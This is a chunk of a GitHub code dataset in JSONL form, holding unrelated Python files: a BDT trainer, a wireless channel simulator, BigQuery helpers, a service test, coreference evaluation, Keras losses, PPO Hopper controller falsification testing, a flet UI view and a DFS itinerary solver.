,bins=binx\n ,linewidth=2\n ,histtype='step'\n ,label=WHanom_label[self.bkg_name]\n ,color='red'\n ,weights = bkg_weight\n # ,density=1\n )\n legend_kargs = {\n # \"bbox_to_anchor\":(.5, 1),\n \"loc\":'upper left',\n \"borderpad\":1,\n \"handletextpad\":1,\n \"fontsize\":11,\n \"labelspacing\":1,\n \"fancybox\":True,\n # 'ncol':2\n }\n ax.legend(**legend_kargs)\n ax.set_xlabel(var,fontsize=15)\n ax.set_ylabel(\"Events\",fontsize=15)\n\n\n\n \n def save_tmva_xml(self,file_loc=''):\n if file_loc=='':\n print(\"specify file location\")\n else:\n mdl = self.model.get_dump()\n input_vars=[]\n for key in self.bdt_vars:\n input_vars.append((key,'F'))\n # for i in input_vars:\n # print(i)\n\n convert_model(mdl,input_variables=input_vars,output_xml=file_loc)\n\n\n\n\ndef prepareSB(data,sigs,bkgs,queryString):\n #preparing signal data\n sig_data = []\n for sig in sigs:\n sig_data.append(data[sig])\n \n signal = pd.concat(sig_data,axis=0)\n signal['proc'] = np.ones(signal.shape[0])\n \n bkg_data = []\n for bkg in bkgs:\n bkg_data.append(data[bkg])\n \n background = pd.concat(bkg_data,axis=0)\n background['proc'] = np.zeros(background.shape[0])\n all_data = pd.concat((signal,background),axis=0)\n all_data = all_data.query(queryString)\n return all_data,signal,background","repo_name":"rohithsaradhy/vh_anom_bdt","sub_path":"tools/bdt_trainer.py","file_name":"bdt_trainer.py","file_ext":"py","file_size_in_byte":18678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36478577888","text":"from typing import Optional, Tuple\n\nimport numpy as np\nimport scipy.io as sio\n\nfrom sixg_radio_mgmt import Channel\n\n\nclass QuadrigaChannels(Channel):\n def __init__(\n self,\n max_number_ues: int,\n max_number_basestations: int,\n num_available_rbs: np.ndarray,\n rng: np.random.Generator = np.random.default_rng(),\n ) -> None:\n super().__init__(\n max_number_ues, max_number_basestations, num_available_rbs, rng\n )\n self.thermal_noise_power = 10e-14\n self.transmission_power = 0.1 # 0.1 Watts = 20 dBm\n self.episode_number = -1\n self.episode_channels = np.empty([])\n\n def step(\n self,\n step_number: int,\n episode_number: int,\n mobilities: np.ndarray,\n sched_decision: Optional[np.ndarray] = None,\n ) -> np.ndarray:\n if self.episode_number != episode_number:\n self.episode_number = episode_number\n self.episode_channels = self.read_mat_files(episode_number)\n\n if sched_decision is not None:\n return self.calc_spectral_eff(sched_decision, step_number)\n else:\n spectral_efficiencies = [\n np.ones((self.max_number_ues, self.num_available_rbs[i]))\n for i in np.arange(self.max_number_basestations)\n ]\n return np.array(spectral_efficiencies)\n\n def calc_spectral_eff(\n self, sched_decision: np.ndarray, step_number: int\n ) -> np.ndarray:\n # Sum transmitter and receiver antennas, and changing dimensions to\n # B x U x R to match sched_decision dimensions. 
After multiplying\n # with sched_decision, we obtain the channels only in the allocated RB\n allocated_rbs_channels = (\n np.expand_dims(\n np.sum(\n np.sum(self.episode_channels[:, :, :, :, step_number], 0),\n 0,\n ),\n 0,\n )\n * sched_decision\n )\n\n allocated_rbs_rsrp = np.power(np.abs(allocated_rbs_channels), 2)\n spectral_efficiencies = np.log2(\n 1\n + (\n (self.transmission_power / self.num_available_rbs[0])\n * allocated_rbs_rsrp\n / self.thermal_noise_power\n )\n )\n return spectral_efficiencies\n\n def read_mat_files(self, episode: int) -> np.ndarray:\n channels = sio.loadmat(f\"channels/quadriga_channels/sim_{episode}.mat\")\n\n return channels[\"H\"]\n","repo_name":"lasseufpa/rrs_industrial_scenario","sub_path":"channels/quadriga.py","file_name":"quadriga.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20707484488","text":"from google.cloud import bigquery\n\ndef bq_create_sensorlog(dataset_id, tablename):\n bigquery_client = bigquery.Client()\n dataset_ref = bigquery_client.dataset(dataset_id)\n\n # Prepares a reference to the table\n table_ref = dataset_ref.table(tablename)\n\n try:\n bigquery_client.get_table(table_ref)\n except:\n schema = [\n bigquery.SchemaField('log_id', 'STRING', mode='REQUIRED', description='UUID'),\n bigquery.SchemaField('loggingTime', 'TIMESTAMP', mode='NULLABLE', description='loggingTime(JST)'),\n bigquery.SchemaField('device_id', 'STRING', mode='NULLABLE', description='device_id'),\n bigquery.SchemaField('locationLatitude', 'FLOAT64', mode='NULLABLE', description='locationLatitude(WGS84)'),\n bigquery.SchemaField('locationLongitude', 'FLOAT64', mode='NULLABLE', description='locationLongitude(WGS84)'),\n bigquery.SchemaField('locationTrueHeading', 'FLOAT64', mode='NULLABLE', description='motionPitch(°)'),\n bigquery.SchemaField('motionPitch', 'FLOAT64', mode='NULLABLE', description='motionPitch(rad)'),\n bigquery.SchemaField('motionRoll', 'FLOAT64', mode='NULLABLE', description='motionRoll(rad)'),\n bigquery.SchemaField('motionYaw', 'FLOAT64', mode='NULLABLE', description='motionYaw(rad)'),\n bigquery.SchemaField('speed', 'FLOAT64', mode='NULLABLE', description='speed(m/s)'),\n bigquery.SchemaField('distance', 'FLOAT64', mode='NULLABLE', description='distanse(m)'),\n ]\n table = bigquery.Table(table_ref, schema=schema)\n table = bigquery_client.create_table(table)\n print('table {} created.'.format(table.table_id))\n\n\ndef bq_create_logmap(dataset_id, tablename):\n bigquery_client = bigquery.Client()\n dataset_ref = bigquery_client.dataset(dataset_id)\n\n # Prepares a reference to the table\n table_ref = dataset_ref.table(tablename)\n\n try:\n bigquery_client.get_table(table_ref)\n except:\n schema = [\n bigquery.SchemaField('outline_id', 'STRING', mode='REQUIRED', description='outline_id'),\n bigquery.SchemaField('html_name', 'STRING', mode='REQUIRED', description='foliumで可視化したhtmlファイル名'),\n ]\n table = bigquery.Table(table_ref, schema=schema)\n table = bigquery_client.create_table(table)\n print('table {} created.'.format(table.table_id))\n\nif __name__ == '__main__':\n dataset_id = \"smartphone_log\"\n tablename = \"sensorlog\"\n bq_create_sensorlog(dataset_id, tablename)\n\n dataset_id = \"smartphone_log\"\n tablename = \"log_map\"\n bq_create_logmap(dataset_id, 
tablename)\n","repo_name":"KeioSailingDev/web_yacht_note","sub_path":"log_insert/bigquery_create.py","file_name":"bigquery_create.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33621964672","text":"import pytest\n\nfrom tests_eats_products import experiments\nfrom tests_eats_products import utils\n\n\nPRODUCTS_BASE_REQUEST = {\n 'shippingType': 'pickup',\n 'slug': 'slug',\n 'category': 1,\n}\n\nPUBLIC_IDS = [\n 'bb231b95-1ff2-4bc4-b78d-dcaa1f69b001',\n 'bb231b95-1ff2-4bc4-b78d-dcaa1f69b002',\n 'bb231b95-1ff2-4bc4-b78d-dcaa1f69b003',\n 'bb231b95-1ff2-4bc4-b78d-dcaa1f69b004',\n 'bb231b95-1ff2-4bc4-b78d-dcaa1f69b005',\n 'bb231b95-1ff2-4bc4-b78d-dcaa1f69b006',\n 'bb231b95-1ff2-4bc4-b78d-dcaa1f69b007',\n]\n\nSKU_IDS = ['1', '2', '3', '4', '5']\n\nTHIS_PLACE_ID = str(utils.PLACE_ID)\nOTHER_PLACE_ID = '2'\n\nEATER_ID = '123'\nHEADERS = {'X-Eats-User': f'user_id={EATER_ID}'}\n\nHAS_HISTORY_BRANDS = ['set', f'has_history:{EATER_ID}:brands', '1']\nHAS_CROSS_BRANDS_HISTORY = ['set', f'has_history:{EATER_ID}:cross_brands', '1']\n\n\n@experiments.cross_brand_history()\n@pytest.mark.config(\n EATS_PRODUCTS_SETTINGS={'discount_promo': {'enabled': True}},\n EATS_PRODUCTS_BADGES=utils.EATS_PRODUCTS_BADGES,\n)\nasync def test_cross_brand_badges_discount(\n taxi_eats_products,\n sql_add_brand,\n sql_add_place,\n mock_nomenclature_static_info_context,\n mock_nomenclature_dynamic_info_context,\n add_default_product_mapping,\n make_public_by_sku_id_response,\n mockserver,\n mock_retail_categories_cross_brand_orders,\n mock_retail_categories_brand_orders_history,\n):\n \"\"\"\n The test verifies the colors set for the discount badge (cross_brand)\n \"\"\"\n sql_add_brand(2, 'brand2')\n sql_add_place(2, 'slug2', 2)\n\n public_ids = PUBLIC_IDS[:2]\n add_default_product_mapping()\n for public_id in public_ids:\n mock_nomenclature_static_info_context.add_product(public_id)\n mock_nomenclature_dynamic_info_context.add_product(\n public_id, old_price=1000,\n )\n\n place_sku_to_public_ids = {\n THIS_PLACE_ID: {\n SKU_IDS[0]: [public_ids[0]],\n SKU_IDS[1]: [public_ids[1]],\n },\n OTHER_PLACE_ID: {SKU_IDS[1]: [public_ids[1]]},\n }\n\n mock_retail_categories_cross_brand_orders.add_product(\n int(THIS_PLACE_ID), PUBLIC_IDS[0], 2, SKU_IDS[0],\n )\n mock_retail_categories_cross_brand_orders.add_product(\n int(THIS_PLACE_ID), PUBLIC_IDS[1], 5, SKU_IDS[1],\n )\n mock_retail_categories_cross_brand_orders.add_product(\n int(OTHER_PLACE_ID), PUBLIC_IDS[1], 5, SKU_IDS[1],\n )\n\n @mockserver.json_handler(utils.Handlers.NOMENCLATURE_PUBLIC_ID_BY_SKU_ID)\n def _mock_public_id_by_sku_id(request):\n return make_public_by_sku_id_response(request, place_sku_to_public_ids)\n\n response = await taxi_eats_products.post(\n utils.Handlers.CROSS_BRAND_HISTORY_PRODUCTS,\n json={\n 'available_places_slugs': ['slug', 'slug2'],\n 'selected_place': {'place_slug': 'slug', 'brand_name': 'Ашан'},\n },\n headers=HEADERS,\n )\n assert response.status_code == 200\n resp_item_0 = response.json()['categories'][0]['products'][0]\n expected = utils.create_expected_badges(\n utils.EATS_PRODUCTS_BADGES['discount_badges'],\n )\n\n utils.compare_badges(resp_item_0, expected)\n\n assert mock_retail_categories_cross_brand_orders.handler.times_called == 
1\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_eats_products/test_cross_brand_badges.py","file_name":"test_cross_brand_badges.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8312279295","text":"\"\"\"Script that runs and evaluates neural coref coreference resolution library on bionlp dataset\"\"\"\nimport glob\nimport logging\nimport os\nimport spacy\nimport neuralcoref\nfrom bionlp_eval import (coref_clusters_to_spans, get_a2_file, get_coref_spans, cluster_comparison, f1_, precision, recall)\n\n# modify model and codes used here\nMODEL = 'ner_models/jnlpba_ner'\nNER_MOD_TO_COMBINE = 'en_ner_craft_md'\nCODES = 'alg_plfp_glfpma_pco_pner' # seperated by '_' -- see results/res_codes.txt\nprune_by_ner = {'DNA', 'RNA', 'PROTEIN', 'CELL_TYPE'}\n####\n\n####\n# change model as needed\nnlp = spacy.load(MODEL)\n# nlp.add_pipe(nlp.create_pipe('sentencizer'))\n####\n# neuralcoref.add_to_pipe(nlp)\n\n\ndef get_txt_files(path_to_files):\n \"\"\"returns iterator which yeilds txt files in given dir\"\"\"\n return glob.iglob(os.path.join(path_to_files, '*.txt'))\n\n\ndef calculate_metrics(pos_neg_dict, pred_gold_totals, greedyness=0.5, write_res=False):\n \"\"\"calculates metrics and writes to txt file\"\"\"\n tp = pos_neg_dict['true_pos']\n fp = pos_neg_dict['false_pos']\n fn = pos_neg_dict['false_neg']\n\n prec = precision(tp, fp)\n rec = recall(tp, fn)\n\n f1 = f1_(prec, rec)\n\n if write_res:\n write_results(f1, prec, rec, pred_gold_totals, pos_neg_dict, greedyness=greedyness)\n\n\ndef write_results(f1, precision, recall, pred_gold_totals, pos_neg_dict, greedyness=0.5):\n with open(f'{MODEL}_{CODES}_g={str(greedyness)}.txt', 'w') as out:\n out.write('[ACCURACY METRICS]')\n out.write(f'\\n[F1] {f1*100}%')\n out.write(f'\\n[PRECISION] {precision*100}%')\n out.write(f'\\n[RECALL] {recall*100}%')\n # total clusters generated\n out.write(f'\\n[TOTAL PREDICTED CLUSTERS] {pred_gold_totals[0]}')\n out.write(f'\\n[TOTAL GOLD CLUSTERS] {pred_gold_totals[1]}')\n out.write(f'\\n[TRUE POSITIVES] {pos_neg_dict[\"true_pos\"]}') \n out.write(f'\\n[FALSE POSITIVES] {pos_neg_dict[\"false_pos\"]}') \n out.write(f'\\n[FALSE NEGATIVES] {pos_neg_dict[\"false_neg\"]}')\n\n# 'DNA', 'CELL_TYPE', 'CELL_LINE', 'RNA', 'PROTEIN'\ndef process_txt_files(txt_files, greedyness=0.5, prune_by_ner=None):\n \"\"\"takes an iterable containing paths txt files\"\"\"\n total_pred = 0\n total_gold = 0\n for f in txt_files:\n logging.info(f'[PROCESSING FILE] {f}')\n f_op = open(f, 'r', encoding='utf-8')\n f_str = f_op.read()\n f_op.close()\n doc = nlp(f_str)\n # funky bug where files with 1 line throw a TypeError\n try:\n nc_clusts = coref_clusters_to_spans(doc._.coref_clusters, doc.text,\n prune_by_ner=prune_by_ner) # neural coref pred clusts\n a2_f = get_a2_file(f) # get corresponding annotated file \n gold_clusts, min_spans = get_coref_spans(a2_f) # bionlp\n except TypeError as te:\n logging.warn(te)\n logging.warn(f'[FILE SKIPPED] {f}')\n print(f'[FILE SKIPPED] {f}')\n continue # muddle about - dont process anyting else in this loop\n # comparison\n pos_neg_dict = cluster_comparison(nc_clusts, gold_clusts, min_spans) # get positive negatives\n # keep track of total\n total_pred += len(nc_clusts)\n total_gold += len(gold_clusts)\n ####\n logging.info(f'[FINISHED PROCESSING FILE] {f}')\n pred_gold_totals = (total_pred, total_gold)\n calculate_metrics(pos_neg_dict, pred_gold_totals, greedyness=greedyness, 
write_res=True)\n\n\nif __name__ == '__main__':\n logging.basicConfig(\n filename=f'log/bionlp_eval.log',\n level=logging.INFO,\n format= '[%(asctime)s] {%(pathname)s:%(lineno)d} %(levelname)s - %(message)s',\n datefmt='%H:%M:%S'\n )\n logger = logging.getLogger('bionlp_eval')\n logger.setLevel(logging.DEBUG)\n\n greedyness = .5\n txt_it = get_txt_files('eval_data/train') # iterator over all txt files in dir\n neuralcoref.add_to_pipe(nlp, greedyness=greedyness)\n process_txt_files(txt_it, greedyness=greedyness, prune_by_ner=prune_by_ner)\n","repo_name":"masonedmison/coref","sub_path":"nueral_bionlp.py","file_name":"nueral_bionlp.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2749162850","text":"from __future__ import absolute_import\n\nimport numpy as np\nimport tensorflow as tf\nfrom keras import backend as K\n\ndef getClassWeights(Y, mu=0.5):\n return np.array([w for w in np.log(mu*Y.shape[0]/Y.sum(axis=0))])\n\ndef focal_loss(y_true, y_pred, alpha, gamma=0.5):\n alpha = K.variable(alpha)\n pt = K.abs(1. - y_true - y_pred)\n pt = K.clip(pt, K.epsilon(), 1. - K.epsilon())\n return K.mean(-alpha * K.pow(1. - pt, gamma) * K.log(pt), axis=-1)\n\ndef u_statistic_loss(y_true, y_pred, gamma=0.2, p=3.0):\n \"\"\" U statistic loss\n Approximates the Area Under Curve score, using approximation based on\n the Wilcoxon-Mann-Whitney U statistic.\n Yan, L., Dodier, R., Mozer, M. C., & Wolniewicz, R. (2003).\n Optimizing Classifier Performance via an Approximation to the Wilcoxon-Mann-Whitney Statistic.\n Measures overall performance for a full range of threshold levels.\n Arguments:\n y_pred: `Tensor`. Predicted values.\n y_true: `Tensor` . Targets (labels), a probability distribution.\n \"\"\"\n with tf.name_scope(\"u_statistic_loss\"):\n \n pos = tf.boolean_mask(y_pred, tf.cast(y_true, tf.bool))\n neg = tf.boolean_mask(y_pred, ~tf.cast(y_true, tf.bool))\n \n pos = tf.expand_dims(pos, 0)\n neg = tf.expand_dims(neg, 1)\n \n difference = tf.zeros_like(pos * neg) + pos - neg - gamma\n masked = tf.boolean_mask(difference, difference < 0.0)\n return tf.reduce_sum(tf.pow(-masked, p))\n\ndef SoftAUC_loss(y_true, y_pred):\n y_true = tf.cast(y_true, tf.int32)\n parts = tf.dynamic_partition(y_pred, y_true, 2)\n y_pos = parts[1]\n y_neg = parts[0]\n y_pos = tf.expand_dims(y_pos, 0)\n y_neg = tf.expand_dims(y_neg, -1)\n return K.mean(K.sigmoid(y_neg - y_pos))\n\ndef SVMrank_loss(y_true, y_pred):\n margin = 1.0\n y_true = tf.cast(y_true, tf.int32)\n parts = tf.dynamic_partition(y_pred, y_true, 2)\n y_pos = parts[1]\n y_neg = parts[0]\n y_pos = tf.expand_dims(y_pos, 0)\n y_neg = tf.expand_dims(y_neg, -1)\n return K.mean(K.relu(margin - y_neg - y_pos))\n\n\n###########experimental losses##############\n\ndef exp_loss(y_true, y_pred):\n loss = u_statistic_loss(y_true,y_pred) + SoftAUC_loss(y_true, y_pred)\n return loss\n\ndef art_loss(y_true, y_pred):\n loss = u_statistic_loss(y_true,y_pred) + SVMrank_loss(y_true, y_pred)\n return loss","repo_name":"thinline72/toxic","sub_path":"skolbachev/toxic/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"66"} +{"seq_id":"71003338452","text":"'''\nHere we consider a controller trained on PPO for the hopper\nenvironment in OpenAI Gym. 
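The trained policy is then stress-tested with Bayesian-optimization-based active testing, searching over perturbations of the initial state and velocities for low-reward or short-lived trajectories. 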
The controller was taken from baselines/ppo\n'''\n\n\nfrom baselines.common import set_global_seeds, tf_util as U\nimport gym, logging\nfrom baselines import logger\nimport numpy as np\nimport tensorflow as tf\nfrom baselines.pposgd import mlp_policy, pposgd_simple\nfrom baselines.pposgd.pposgd_simple import *\n\ndef learn_return(env, policy_func, *,\n timesteps_per_batch, # timesteps per actor per update\n clip_param, entcoeff, # clipping parameter epsilon, entropy coeff\n optim_epochs, optim_stepsize, optim_batchsize,# optimization hypers\n gamma, lam, # advantage estimation\n max_timesteps=0, max_episodes=0, max_iters=0, max_seconds=0, # time constraint\n callback=None, # you can do anything in the callback, since it takes locals(), globals()\n schedule='constant' # annealing for stepsize parameters (epsilon and adam)\n ):\n # Setup losses and stuff\n # ----------------------------------------\n ob_space = env.observation_space\n ac_space = env.action_space\n pi = policy_func(\"pi\", ob_space, ac_space) # Construct network for new policy\n oldpi = policy_func(\"oldpi\", ob_space, ac_space) # Network for old policy\n atarg = tf.placeholder(dtype=tf.float32, shape=[None]) # Target advantage function (if applicable)\n ret = tf.placeholder(dtype=tf.float32, shape=[None]) # Empirical return\n\n lrmult = tf.placeholder(name='lrmult', dtype=tf.float32, shape=[]) # learning rate multiplier, updated with schedule\n clip_param = clip_param * lrmult # Annealed cliping parameter epislon\n\n ob = U.get_placeholder_cached(name=\"ob\")\n ac = pi.pdtype.sample_placeholder([None])\n\n kloldnew = oldpi.pd.kl(pi.pd)\n ent = pi.pd.entropy()\n meankl = U.mean(kloldnew)\n meanent = U.mean(ent)\n pol_entpen = (-entcoeff) * meanent\n\n ratio = tf.exp(pi.pd.logp(ac) - oldpi.pd.logp(ac)) # pnew / pold\n surr1 = ratio * atarg # surrogate from conservative policy iteration\n surr2 = U.clip(ratio, 1.0 - clip_param, 1.0 + clip_param) * atarg #\n pol_surr = - U.mean(tf.minimum(surr1, surr2)) # PPO's pessimistic surrogate (L^CLIP)\n vfloss1 = tf.square(pi.vpred - ret)\n vpredclipped = oldpi.vpred + tf.clip_by_value(pi.vpred - oldpi.vpred, -clip_param, clip_param)\n vfloss2 = tf.square(vpredclipped - ret)\n vf_loss = .5 * U.mean(tf.maximum(vfloss1, vfloss2)) # we do the same clipping-based trust region for the value function\n total_loss = pol_surr + pol_entpen + vf_loss\n losses = [pol_surr, pol_entpen, vf_loss, meankl, meanent]\n loss_names = [\"pol_surr\", \"pol_entpen\", \"vf_loss\", \"kl\", \"ent\"]\n\n var_list = pi.get_trainable_variables()\n lossandgrad = U.function([ob, ac, atarg, ret, lrmult], losses + [U.flatgrad(total_loss, var_list)])\n adam = MpiAdam(var_list)\n\n assign_old_eq_new = U.function([],[], updates=[tf.assign(oldv, newv)\n for (oldv, newv) in zipsame(oldpi.get_variables(), pi.get_variables())])\n compute_losses = U.function([ob, ac, atarg, ret, lrmult], losses)\n\n U.initialize()\n adam.sync()\n\n # Prepare for rollouts\n # ----------------------------------------\n seg_gen = traj_segment_generator(pi, env, timesteps_per_batch, stochastic=True)\n\n episodes_so_far = 0\n timesteps_so_far = 0\n iters_so_far = 0\n tstart = time.time()\n lenbuffer = deque(maxlen=100) # rolling buffer for episode lengths\n rewbuffer = deque(maxlen=100) # rolling buffer for episode rewards\n\n assert sum([max_iters>0, max_timesteps>0, max_episodes>0, max_seconds>0])==1, \"Only one time constraint permitted\"\n\n while True:\n if callback: callback(locals(), globals())\n if max_timesteps and timesteps_so_far >= 
max_timesteps:\n break\n elif max_episodes and episodes_so_far >= max_episodes:\n break\n elif max_iters and iters_so_far >= max_iters:\n break\n elif max_seconds and time.time() - tstart >= max_seconds:\n break\n\n if schedule == 'constant':\n cur_lrmult = 1.0\n elif schedule == 'linear':\n cur_lrmult = max(1.0 - float(timesteps_so_far) / max_timesteps, 0)\n else:\n raise NotImplementedError\n\n logger.log(\"********** Iteration %i ************\"%iters_so_far)\n\n seg = seg_gen.__next__()\n print(sum(seg['rew']),seg['rew'], len(seg['rew']))\n add_vtarg_and_adv(seg, gamma, lam)\n\n # ob, ac, atarg, ret, td1ret = map(np.concatenate, (obs, acs, atargs, rets, td1rets))\n ob, ac, atarg, tdlamret = seg[\"ob\"], seg[\"ac\"], seg[\"adv\"], seg[\"tdlamret\"]\n vpredbefore = seg[\"vpred\"] # predicted value function before udpate\n atarg = (atarg - atarg.mean()) / atarg.std() # standardized advantage function estimate\n d = Dataset(dict(ob=ob, ac=ac, atarg=atarg, vtarg=tdlamret), shuffle=not pi.recurrent)\n optim_batchsize = optim_batchsize or ob.shape[0]\n\n if hasattr(pi, \"ob_rms\"): pi.ob_rms.update(ob) # update running mean/std for policy\n\n assign_old_eq_new() # set old parameter values to new parameter values\n logger.log(\"Optimizing...\")\n logger.log(fmt_row(13, loss_names))\n # Here we do a bunch of optimization epochs over the data\n for _ in range(optim_epochs):\n losses = [] # list of tuples, each of which gives the loss for a minibatch\n for batch in d.iterate_once(optim_batchsize):\n *newlosses, g = lossandgrad(batch[\"ob\"], batch[\"ac\"], batch[\"atarg\"], batch[\"vtarg\"], cur_lrmult)\n adam.update(g, optim_stepsize * cur_lrmult)\n losses.append(newlosses)\n logger.log(fmt_row(13, np.mean(losses, axis=0)))\n lrlocal = (seg[\"ep_lens\"], seg[\"ep_rets\"]) # local values\n listoflrpairs = MPI.COMM_WORLD.allgather(lrlocal) # list of tuples\n lens, rews = map(flatten_lists, zip(*listoflrpairs))\n episodes_so_far += len(lens)\n timesteps_so_far += sum(lens)\n iters_so_far+=1\n\n return pi\n\nU.make_session(num_cpu=1).__enter__()\nseed = np.random.randint(2**32-1)\nset_global_seeds(seed)\nenv_id = 'Hopper-v1'\nenv = gym.make(env_id)\nnum_timesteps=5e6\n\ndef policy_fn(name, ob_space, ac_space):\n return mlp_policy.MlpPolicy(name=name, ob_space=ob_space, ac_space=ac_space,\n hid_size=64, num_hid_layers=2)\n\nenv.seed(seed)\ngym.logger.setLevel(logging.WARN)\npi = learn_return(env, policy_fn,\n max_timesteps=num_timesteps,\n timesteps_per_batch=2048,\n clip_param=0.2, entcoeff=0.0,\n optim_epochs=10, optim_stepsize=3e-4, optim_batchsize=64,\n gamma=0.99, lam=0.95,\n )\n\ndef compute_traj(**kwargs):\n env.reset()\n # This sets the init_qpos\n if 'init_state' in kwargs:\n env.env.init_qpos = kwargs['init_state']\n # State perturbation\n if 'state_per' in kwargs:\n state_per = kwargs['state_per']\n # Velocity perturbation\n if 'vel_per' in kwargs:\n vel_per = kwargs['vel_per']\n\n qpos = state_per+env.env.init_qpos\n qvel = vel_per+env.env.init_qvel\n env.env.set_state(qpos,qvel)\n ob = env.env._get_obs()\n traj = [ob]\n reward = 0\n done=False\n iters = 0\n while not done:\n action, vpred = pi.act(False,ob)\n ob, r, done, additional_data = env.step(action)\n reward += r\n traj.append(ob)\n iters+=1\n additional_data['reward']=reward\n additional_data['iters'] = iters\n return traj, additional_data\n\n# ------------------------------------------------------------------------------\nfrom active_testing import pred_node, max_node, min_node, test_module\nfrom active_testing.utils import 
sample_from\nrand_nums=[1230597240,\n 366379077,\n 1450717077,\n 4233612701,\n 315635237,\n 717888137,\n 4012326164,\n 3986671499,\n 1738011324,\n 719534766]\n\nbounds = [(-0.005, 0.005)]*7\nbounds[0] = (1.23, 1.27) # Bounds on the init_state and velocity perturbation\n\ndef sut(x0):\n init_state = x0[0]\n init_qpos = np.zeros(6)\n init_qpos[1] = init_state\n state_per = np.zeros(6)\n vel_per = x0[1:7]\n return compute_traj(init_state=init_qpos, state_per=state_per,\n vel_per=vel_per)\n\n\n# Requirement 1: Find the initial state and velocity that minimizes the reward\n# We need only one node for the reward. The reward is a smooth function\n# given that the closed loop system is deterministic\n\nsmooth_details_r1 = []\nrandom_details_r1 = []\n\n\n# This set assumes random sampling and checking\nfor r in rand_nums:\n np.random.seed(r)\n node0 = pred_node(f=lambda traj: traj[1]['reward'])\n TM = test_module(bounds=bounds, sut=lambda x0: sut(x0),\n f_tree = node0, with_random = True, init_sample = 70,\n optimize_restarts=5, exp_weight=10)\n TM.initialize()\n TM.run_BO(180)\n smooth_details_r1.append([np.sum(TM.f_acqu.GP.Y < -3.75),\n TM.smooth_min_x,TM.smooth_min_val])\n random_details_r1.append([np.sum(np.array(TM.random_Y) < -3.75),\n TM.rand_min_x, TM.rand_min_val])\n print(r, smooth_details_r1[-1], random_details_r1[-1])\n\n# Requirement 2: Find the initial state, goal state that minimizes the amount\n# of time the robot is able to stay upright\n# We need only one node for the time. The time taken is a smooth function\n# given that the closed loop system is deterministic.\n\nsmooth_details_r2 = []\nrandom_details_r2 = []\n\n\n# This set assumes random sampling and checking\nfor r in rand_nums[0:2]:\n np.random.seed(r)\n node0 = pred_node(f=lambda traj: traj[1]['iters'])\n TM = test_module(bounds=bounds, sut=lambda x0: sut(x0),\n f_tree = node0, with_random = True, init_sample = 70,\n optimize_restarts=5, exp_weight=10)\n TM.initialize()\n TM.run_BO(180)\n smooth_details_r2.append([np.sum(TM.f_acqu.GP.Y < 50),\n TM.smooth_min_x,TM.smooth_min_val])\n random_details_r2.append([np.sum(np.array(TM.random_Y) < 50),\n TM.rand_min_x, TM.rand_min_val])\n print(r, smooth_details_r2[-1], random_details_r2[-1])","repo_name":"shromonag/adversarial_testing","sub_path":"tests/test_hopper.py","file_name":"test_hopper.py","file_ext":"py","file_size_in_byte":10169,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"38573861856","text":"from flet import *\nfrom data import *\n\nclass SignUpSuccess(UserControl):\n def __init__(self, page: Page):\n self.page = page\n super().__init__()\n\n def login(self, event):\n self.page.go(\"/login\")\n\n def home(self, event):\n self.page.go(\"/\")\n \n def build(self):\n self.close_btn = Container(\n alignment= alignment.top_left,\n content = IconButton(\n icon = icons.CLOSE_SHARP,\n icon_color= colors.WHITE,\n on_click= self.home,\n )\n )\n self.check_mark = Container(\n padding= 5,\n bgcolor= GREEN_COLOR,\n border_radius= 35,\n height= 70,\n width = 70,\n margin= 70,\n content = Icon(\n icons.CHECK_SHARP,\n color = colors.WHITE,\n size= 30\n )\n )\n\n self.success = Container(\n margin= 10,\n content= Text(\n \"Success!\",\n color = colors.WHITE,\n size = 30,\n weight = FontWeight.BOLD,\n text_align= TextAlign.CENTER\n )\n )\n self.hint = Container(\n margin = margin.only(bottom=150),\n content= Text(\n value=\"You have successfully signup proceed to \",\n size= 14,\n weight= FontWeight.W_400,\n color = 
colors.WHITE,\n text_align = TextAlign.CENTER,\n spans=[\n TextSpan(\n text=\"Login Page\",\n style= TextStyle(\n color= GREEN_COLOR\n ),\n on_click = self.login\n )\n ]\n )\n )\n \n self.chat = Container(\n margin= 10,\n content= Text(\n \"Chat with us\",\n color = GREEN_COLOR,\n size = 14,\n weight = FontWeight.W_500,\n text_align= TextAlign.CENTER\n )\n )\n self.page_controls = Column(\n alignment = MainAxisAlignment.CENTER,\n horizontal_alignment= CrossAxisAlignment.CENTER,\n controls= [\n self.close_btn,\n self.check_mark,\n self.success,\n self.hint,\n self.chat\n ]\n )\n\n return self.page_controls","repo_name":"philippython/Python-Programming-Mastery","sub_path":"Section 22 Building a Fintech App with flet/final code/leon/views/signup_success.py","file_name":"signup_success.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"73422122449","text":"'''\nDFS + backtracking\n'''\ndef dfs(graph,tLen,result,now):\n result.append(now)\n if len(result)==tLen+1: return True\n if now not in graph:\n result.pop()\n return False\n #examine the values connected to now\n for _ in range(len(graph[now])):\n next=graph[now][-1]\n #remove the last element of now's adjacency list\n graph[now].pop()\n if dfs(graph,tLen,result,next):\n return True\n graph[now].insert(0,next)\n result.pop()\n return False\n\ndef solution(tickets):\n graph={}\n for start,end in tickets:\n # get(key to look up, default value if the key is missing)\n graph[start]=graph.get(start,[])+[end]\n #sort the values in reverse order (so they can be popped from the back)\n for key in graph.keys():\n graph[key].sort(reverse=True)\n path=[]\n if dfs(graph,len(tickets),path,'ICN'):\n result=path\n return result\n\n#print(solution([[\"ICN\", \"JFK\"], [\"HND\", \"IAD\"], [\"JFK\", \"HND\"]]))\n#print(solution([[\"ICN\", \"SFO\"], [\"ICN\", \"ATL\"], [\"SFO\", \"ATL\"], [\"ATL\", \"ICN\"], 